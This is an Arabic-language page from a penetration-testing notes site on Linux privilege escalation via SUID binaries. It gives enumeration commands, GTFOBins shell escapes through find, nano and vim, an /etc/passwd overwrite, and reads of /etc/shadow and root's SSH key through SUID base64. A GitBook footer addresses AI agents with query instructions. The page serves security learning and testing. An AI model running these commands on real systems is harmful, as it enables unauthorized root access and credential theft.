> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/suid.md).

# SUID

تُنفَّذ الملفات الثنائية ذات SUID بصلاحيات مالكها، وغالبًا ما يكون root. يمكن لملف ثنائي SUID ضعيف أو قديم أو مرن أكثر من اللازم أن يقرأ ملفات محمية، أو يفتح صدفة بصلاحيات مرتفعة، أو ينفذ شيفرة يسيطر عليها المهاجم.

## المنهجية

* احصر الملفات الثنائية ذات SUID وقارن الإدخالات غير المعتادة مع GTFOBins.
* أعطِ الأولوية للملفات الثنائية المخصصة، والإصدارات القديمة، والاعتماديات القابلة للكتابة، والملفات الثنائية الموجودة خارج مسارات النظام القياسية.
* اختبر بدائيات القراءة والكتابة وتنفيذ الأوامر وتحميل المكتبات قبل تشغيل الحمولات التخريبية.

## فحوصات سريعة

```bash
find / -perm -4000 -type f 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
```

## مراجعة SUID وSGID

يُشغِّل SUID الملف الثنائي بصلاحيات مالك الملف، بينما يُشغِّل SGID الملف الثنائي بصلاحيات مجموعة الملف. بعد الجرد، قارن الملفات الثنائية غير المعتادة مع [GTFOBins](https://gtfobins.github.io/) وأعطِ الأولوية للمسارات المخصصة، والمجلدات القابلة للكتابة، والملفات الثنائية المملوكة لـ root.

فحوصات سريعة مفيدة:

```bash
find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -2000 -ls 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \; 2>/dev/null
```

أمثلة شائعة على طريقة GTFOBins:

```bash
find . -exec /bin/sh -p \; -quit
```

بالنسبة إلى `nano`، استخدم `Ctrl+R`، ثم `Ctrl+X`، ثم شغّل:

```
reset; sh 1>&0 2>&0
```

بالنسبة إلى `vim`:

```bash
vim -c ':shell'
vim -c ':!/bin/sh'
```

إذا كان تدفّق النسخ في SUID/بصلاحيات مرتفعة قادرًا على استبدال الملفات الحساسة، فتحقق من بدائية الكتابة بعناية قبل لمس ملفات الإنتاج:

```bash
cp /tmp/malicious_passwd /etc/passwd
```

إذا `base64` إذا كان SUID، فاستخدمه كبدائية قراءة بدلاً من بدائية صدفة:

```bash
ls -la /usr/bin/base64
/usr/bin/base64 /etc/shadow | base64 --decode
/usr/bin/base64 /root/.ssh/id_rsa | base64 --decode
/usr/bin/base64 /var/log/auth.log | base64 --decode
```

إذا `cp` إذا كان SUID، فتحقق مما إذا كان يمكنه إنشاء نسخة بصلاحيات مرتفعة أو الحفاظ عليها:

```bash
cp /bin/sh /tmp/sh
chmod +s /tmp/sh
/tmp/sh -p
```

الملفات الثنائية الشائعة ذات SUID/SGID التي تستحق المراجعة:

| الملف الثنائي                                         | سبب الفحص                                                |
| ----------------------------------------------------- | -------------------------------------------------------- |
| `sudo` / `su`                                         | أدوات مباشرة لعبور حدود الصلاحيات.                       |
| `passwd`, `chsh`, `newgrp`, `gpasswd`                 | مساعدات تعديل الحسابات والمجموعات.                       |
| `at`                                                  | تنفيذ الأوامر المجدولة.                                  |
| `mount`, `umount`                                     | الوصول إلى نظام الملفات وخيارات التركيب.                 |
| `pkexec`                                              | مساعد Polkit، وقد تأثر تاريخيًا بثغرة PwnKit.            |
| `base64`                                              | اقرأ الملفات المحمية وفك ترميزها محليًا.                 |
| `cp`                                                  | انسخ الملفات أو استبدلها عندما تسمح الأذونات بذلك.       |
| `find`, `nano`, `vim`, `less`, `more`, `bash`, `dash` | بدائيات صدفة أو قراءة أو كتابة ملفات على طريقة GTFOBins. |
| `nmap`                                                | الوضع التفاعلي القديم أو مسارات تنفيذ البرامج النصية.    |

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID pkexec / PwnKit</h4></td><td>ملاحظات SUID (Pkexec) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/35760ceda5081b3d75625b8a74e829e7a555b7aa">/pages/35760ceda5081b3d75625b8a74e829e7a555b7aa</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Base64</h4></td><td>ملاحظات SUID (Base64) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/75b92337e0abfcd437c1445f9ea131ed647fdddf">/pages/75b92337e0abfcd437c1445f9ea131ed647fdddf</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID PHP</h4></td><td>ملاحظات SUID (PHP) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/4531163f05e9494490cf0bad21a2877364964267">/pages/4531163f05e9494490cf0bad21a2877364964267</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID تفريغ الذاكرة /opt/count</h4></td><td>ملاحظات SUID - تفريغ الذاكرة (/opt/count) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/a7c952eff54570c2286e37aaf01f1a57826254ae">/pages/a7c952eff54570c2286e37aaf01f1a57826254ae</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID ملف مفقود</h4></td><td>ملاحظات ملف ثنائي SUID (ملف مفقود) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/b5374841f92dc60faa6e27aa8b61989b635fd0d0">/pages/b5374841f92dc60faa6e27aa8b61989b635fd0d0</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID screen</h4></td><td>ملاحظات SUID (screen) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/10f6e932162796438c53a1ae28c0fa74953ac688">/pages/10f6e932162796438c53a1ae28c0fa74953ac688</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Nmap</h4></td><td>ملاحظات SUID (Nmap) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/f8c421685c1466a7e80e487da3fdf740234fdc7c">/pages/f8c421685c1466a7e80e487da3fdf740234fdc7c</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>الملف الثنائي الاحتياطي ذو SUID</h4></td><td>ملاحظات الملف الثنائي ذو SUID (النسخة الاحتياطية) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/5749f06dcef969fba39e6f9192ea01bd3c021b59">/pages/5749f06dcef969fba39e6f9192ea01bd3c021b59</a></td></tr><tr><td><h3><i class="fa-id-card" style="color:$primary;">:id-card:</i></h3></td><td><h4>SUID Enlightenment</h4></td><td>ملاحظات SUID (Enlightenment) لتصعيد صلاحيات Linux، مع خطوات الجرد، وأمثلة الاستغلال، والتحقق الموجّه للتقارير.</td><td><a href="/pages/d2082a17c422f55ebf67a4471d417533e27fa754">/pages/d2082a17c422f55ebf67a4471d417533e27fa754</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/suid.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
